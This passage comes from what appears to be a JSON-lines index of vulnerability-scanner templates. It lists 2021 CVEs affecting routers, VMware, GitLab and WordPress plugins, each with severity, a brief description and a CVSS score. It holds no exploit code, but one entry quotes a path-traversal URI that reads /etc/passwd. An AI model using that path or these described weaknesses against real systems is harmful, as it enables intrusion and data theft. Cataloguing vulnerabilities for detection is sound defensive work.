privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-20123.yaml"} +{"ID":"CVE-2021-20124","Info":{"Name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","Severity":"high","Description":"Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-20124.yaml"} +{"ID":"CVE-2021-20137","Info":{"Name":"Gryphon Tower - Cross-Site Scripting","Severity":"medium","Description":"Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20137.yaml"} +{"ID":"CVE-2021-20150","Info":{"Name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","Severity":"medium","Description":"Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-20150.yaml"} +{"ID":"CVE-2021-20158","Info":{"Name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","Severity":"critical","Description":"Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-20158.yaml"} +{"ID":"CVE-2021-20167","Info":{"Name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","Severity":"high","Description":"Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.","Classification":{"CVSSScore":"8"}},"file_path":"cves/2021/CVE-2021-20167.yaml"} +{"ID":"CVE-2021-20323","Info":{"Name":"Keycloak \u003c 18.0.0 - Cross Site Scripting","Severity":"medium","Description":"Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20323.yaml"} +{"ID":"CVE-2021-20792","Info":{"Name":"WordPress Quiz and Survey Master \u003c7.1.14 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20792.yaml"} +{"ID":"CVE-2021-20837","Info":{"Name":"MovableType - Remote Command Injection","Severity":"critical","Description":"MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-20837.yaml"} +{"ID":"CVE-2021-21234","Info":{"Name":"Spring Boot Actuator Logview Directory Traversal","Severity":"high","Description":"spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\".\n","Classification":{"CVSSScore":"7.7"}},"file_path":"cves/2021/CVE-2021-21234.yaml"} +{"ID":"CVE-2021-21287","Info":{"Name":"MinIO Browser API - Server-Side Request Forgery","Severity":"high","Description":"MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.","Classification":{"CVSSScore":"7.7"}},"file_path":"cves/2021/CVE-2021-21287.yaml"} +{"ID":"CVE-2021-21307","Info":{"Name":"Lucee Admin - Remote Code Execution","Severity":"critical","Description":"Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-21307.yaml"} +{"ID":"CVE-2021-21311","Info":{"Name":"Adminer \u003c4.7.9 - Server-Side Request Forgery","Severity":"high","Description":"Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2021/CVE-2021-21311.yaml"} +{"ID":"CVE-2021-21315","Info":{"Name":"Node.JS System Information Library \u003c5.3.1 - Remote Command Injection","Severity":"high","Description":"Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package \"systeminformation\") is an open source collection of functions to retrieve detailed hardware, system and OS information.","Classification":{"CVSSScore":"7.8"}},"file_path":"cves/2021/CVE-2021-21315.yaml"} +{"ID":"CVE-2021-21389","Info":{"Name":"BuddyPress REST API \u003c7.2.1 - Privilege Escalation/Remote Code Execution","Severity":"high","Description":"WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-21389.yaml"} +{"ID":"CVE-2021-21402","Info":{"Name":"Jellyfin \u003c10.7.0 - Local File Inclusion","Severity":"medium","Description":"Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-21402.yaml"} +{"ID":"CVE-2021-21479","Info":{"Name":"SCIMono \u003c0.0.19 - Remote Code Execution","Severity":"critical","Description":"SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and\nexecute java expressions and compromise the availability and integrity of the system.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2021/CVE-2021-21479.yaml"} +{"ID":"CVE-2021-21745","Info":{"Name":"ZTE MF971R - Referer authentication bypass","Severity":"medium","Description":"ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould\nuse this vulnerability to perform illegal authorization operations by sending a request to the user to click.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2021/CVE-2021-21745.yaml"} +{"ID":"CVE-2021-21799","Info":{"Name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","Severity":"medium","Description":"Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-21799.yaml"} +{"ID":"CVE-2021-21800","Info":{"Name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","Severity":"medium","Description":"Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-21800.yaml"} +{"ID":"CVE-2021-21801","Info":{"Name":"Advantech R-SeeNet - Cross-Site Scripting","Severity":"medium","Description":"Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-21801.yaml"} +{"ID":"CVE-2021-21802","Info":{"Name":"Advantech R-SeeNet - Cross-Site Scripting","Severity":"medium","Description":"Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-21802.yaml"} +{"ID":"CVE-2021-21803","Info":{"Name":"Advantech R-SeeNet - Cross-Site Scripting","Severity":"medium","Description":"Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-21803.yaml"} +{"ID":"CVE-2021-21805","Info":{"Name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","Severity":"critical","Description":"Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-21805.yaml"} +{"ID":"CVE-2021-21816","Info":{"Name":"D-Link DIR-3040 - Syslog Information Disclosure","Severity":"medium","Description":"An information disclosure vulnerability exists in the Syslog functionality of D-Link DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2021/CVE-2021-21816.yaml"} +{"ID":"CVE-2021-21881","Info":{"Name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","Severity":"critical","Description":"Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.","Classification":{"CVSSScore":"9.9"}},"file_path":"cves/2021/CVE-2021-21881.yaml"} +{"ID":"CVE-2021-21972","Info":{"Name":"VMware vSphere Client (HTML5) - Remote Code Execution","Severity":"critical","Description":"VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-21972.yaml"} +{"ID":"CVE-2021-21973","Info":{"Name":"VMware vCenter Unauthenticated SSRF","Severity":"medium","Description":"The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-21973.yaml"} +{"ID":"CVE-2021-21975","Info":{"Name":"vRealize Operations Manager API - Server-Side Request Forgery","Severity":"high","Description":"vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-21975.yaml"} +{"ID":"CVE-2021-21978","Info":{"Name":"VMware View Planner \u003c4.6 SP1- Remote Code Execution","Severity":"critical","Description":"VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.\nAn unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted\nfile leading to remote code execution within the logupload container.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-21978.yaml"} +{"ID":"CVE-2021-21985","Info":{"Name":"VMware vSphere Client (HTML5) - Remote Code Execution","Severity":"critical","Description":"The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-21985.yaml"} +{"ID":"CVE-2021-22005","Info":{"Name":"VMware vCenter Server - Arbitrary File Upload","Severity":"critical","Description":"VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-22005.yaml"} +{"ID":"CVE-2021-22053","Info":{"Name":"Spring Cloud Netflix Hystrix Dashboard \u003c2.2.10 - Remote Code Execution","Severity":"high","Description":"Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-22053.yaml"} +{"ID":"CVE-2021-22054","Info":{"Name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","Severity":"high","Description":"VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-22054.yaml"} +{"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross-Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-22122.yaml"} +{"ID":"CVE-2021-22145","Info":{"Name":"ElasticSearch 7.13.3 - Memory disclosure","Severity":"medium","Description":"A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-22145.yaml"} +{"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2021/CVE-2021-22205.yaml"} +{"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2021/CVE-2021-22214.yaml"} +{"ID":"CVE-2021-22873","Info":{"Name":"Revive Adserver \u003c5.1.0 - Open Redirect","Severity":"medium","Description":"Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-22873.yaml"} +{"ID":"CVE-2021-22911","Info":{"Name":"Rocket.Chat \u003c=3.13 - NoSQL Injection","Severity":"critical","Description":"Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-22911.yaml"} +{"ID":"CVE-2021-22986","Info":{"Name":"F5 BIG-IP iControl REST unauthenticated RCE","Severity":"critical","Description":"The iControl REST interface has an unauthenticated remote command execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-22986.yaml"} +{"ID":"CVE-2021-23241","Info":{"Name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","Severity":"medium","Description":"MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-23241.yaml"} +{"ID":"CVE-2021-24146","Info":{"Name":"WordPress Modern Events Calendar Lite \u003c5.16.5 - Sensitive Information Disclosure","Severity":"high","Description":"WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24146.yaml"} +{"ID":"CVE-2021-24150","Info":{"Name":"Like Button Rating \u003c 2.6.32 - Unauthenticated Full-Read SSRF","Severity":"high","Description":"The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24150.yaml"} +{"ID":"CVE-2021-24165","Info":{"Name":"WordPress Ninja Forms \u003c3.4.34 - Open Redirect","Severity":"medium","Description":"WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24165.yaml"} +{"ID":"CVE-2021-24176","Info":{"Name":"WordPress JH 404 Logger \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-24176.yaml"} +{"ID":"CVE-2021-24210","Info":{"Name":"WordPress PhastPress \u003c1.111 - Open Redirect","Severity":"medium","Description":"WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24210.yaml"} +{"ID":"CVE-2021-24214","Info":{"Name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24214.yaml"} +{"ID":"CVE-2021-24226","Info":{"Name":"AccessAlly \u003c3.5.7 - Sensitive Information Leakage","Severity":"high","Description":"WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24226.yaml"} +{"ID":"CVE-2021-24227","Info":{"Name":"Patreon WordPress \u003c 1.7.0 - Unauthenticated Local File Disclosure","Severity":"high","Description":"The Jetpack Scan team identified a Local File Disclosure vulnerability in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting the site. Using this attack vector, an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24227.yaml"} +{"ID":"CVE-2021-24235","Info":{"Name":"WordPress Goto Tour \u0026 Travel Theme \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Goto Tour \u0026 Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24235.yaml"} +{"ID":"CVE-2021-24236","Info":{"Name":"WordPress Imagements \u003c=1.2.5 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24236.yaml"} +{"ID":"CVE-2021-24237","Info":{"Name":"WordPress Realteo \u003c=1.2.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24237.yaml"} +{"ID":"CVE-2021-24245","Info":{"Name":"WordPress Stop Spammers \u003c2021.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24245.yaml"} +{"ID":"CVE-2021-24274","Info":{"Name":"WordPress Supsystic Ultimate Maps \u003c1.2.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24274.yaml"} +{"ID":"CVE-2021-24275","Info":{"Name":"Popup by Supsystic \u003c1.10.5 - Cross-Site scripting","Severity":"medium","Description":"WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24275.yaml"} +{"ID":"CVE-2021-24276","Info":{"Name":"WordPress Supsystic Contact Form \u003c1.7.15 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24276.yaml"} +{"ID":"CVE-2021-24278","Info":{"Name":"WordPress Contact Form 7 \u003c2.3.4 - Arbitrary Nonce Generation","Severity":"high","Description":"WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24278.yaml"} +{"ID":"CVE-2021-24284","Info":{"Name":"WordPress Kaswara Modern VC Addons \u003c=3.0.1 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24284.yaml"} +{"ID":"CVE-2021-24285","Info":{"Name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","Severity":"critical","Description":"The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24285.yaml"} +{"ID":"CVE-2021-24288","Info":{"Name":"WordPress AcyMailing \u003c7.5.0 - Open Redirect","Severity":"medium","Description":"WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24288.yaml"} +{"ID":"CVE-2021-24291","Info":{"Name":"WordPress Photo Gallery by 10Web \u003c1.5.69 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24291.yaml"} +{"ID":"CVE-2021-24298","Info":{"Name":"WordPress Simple Giveaways \u003c2.36.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24298.yaml"} +{"ID":"CVE-2021-24300","Info":{"Name":"WordPress WooCommerce \u003c1.13.22 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24300.yaml"} +{"ID":"CVE-2021-24316","Info":{"Name":"WordPress Mediumish Theme \u003c=1.0.47 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24316.yaml"} +{"ID":"CVE-2021-24320","Info":{"Name":"WordPress Bello Directory \u0026 Listing Theme \u003c1.6.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Bello Directory \u0026 Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24320.yaml"} +{"ID":"CVE-2021-24335","Info":{"Name":"WordPress Car Repair Services \u0026 Auto Mechanic Theme \u003c4.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Car Repair Services \u0026 Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24335.yaml"} +{"ID":"CVE-2021-24340","Info":{"Name":"WordPress Statistics \u003c13.0.8 - Blind SQL Injection","Severity":"high","Description":"WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24340.yaml"} +{"ID":"CVE-2021-24342","Info":{"Name":"WordPress JNews Theme \u003c8.0.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24342.yaml"} +{"ID":"CVE-2021-24358","Info":{"Name":"Plus Addons for Elementor Page Builder \u003c 4.1.10 - Open Redirect","Severity":"medium","Description":"WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24358.yaml"} +{"ID":"CVE-2021-24364","Info":{"Name":"WordPress Jannah Theme \u003c5.4.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24364.yaml"} 